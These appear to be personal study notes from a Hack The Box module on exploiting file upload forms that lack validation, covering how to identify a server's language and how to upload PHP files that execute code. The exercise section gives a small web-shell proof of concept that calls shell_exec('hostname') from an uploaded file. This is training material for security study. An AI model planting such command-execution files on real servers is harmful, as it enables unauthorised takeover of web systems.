2 - Exploiting Absent Validation

# Intro - The most basic type of file upload vulnerability occurs when the web app does not have any form of validation filters on the uploaded files, which, in turn, allows the upload of any file type by default # Arbitrary File Upload - No mention of allowed file types on page ![[images/Pasted image 20251222195700.png]] - If you click upload, the file selector dialog allows for `all files` ![[images/Pasted image 20251222195735.png]] # Identifying Web Framework - The most common scripts that allow us exploit web applications through arbitrary file upload as webshells and revshells - A web shell has to be written in the same programming language that runs the web server, as it runs platform-specific functions and commands to execute system commands on the back-end server, making web shells non-cross-platform scripts - So, the first step would be to identify what language runs the web application - One easy method to determine what language runs the web application is to visit the `/index.ext` page, where we would swap out `ext` with various common web extensions, like `php`, `asp`, `aspx`, among others - Several other techniques may help identify the technologies running the web application, like using the [Wappalyzer](https://www.wappalyzer.com/) extension, which is available for all major browsers ![[images/Pasted image 20251222195948.png]] - We may also run web scanners to identify the web framework, like Burp/ZAP scanners or other Web Vulnerability Assessment tools # Vuln Identification - Now that we have identified the web framework running the web application and its programming language, we can test whether we can upload a file with the same extension - As an initial test to identify whether we can upload arbitrary `PHP` files, let's create a basic `Hello World` script to test whether we can execute `PHP` code with our uploaded file ```bash echo '<?php echo "Hello HTB";?>' > test.php ``` - Upload `test.php` and either click download or visit `http://server_ip:port/uploads/test.php` - The output shows that our php code is being executed ![[images/Pasted image 20251222200706.png]] # Exercise - create a php file that executes the `hostname` command ```php echo '<?php echo shell_exec('hostname'); ?>' > hostname.php ``` ![[images/Pasted image 20251222201236.png]] - upload `hostname.php` ![[images/Pasted image 20251222201321.png]] - visit `/uploads/hostname.php` ![[images/Pasted image 20251222201409.png]]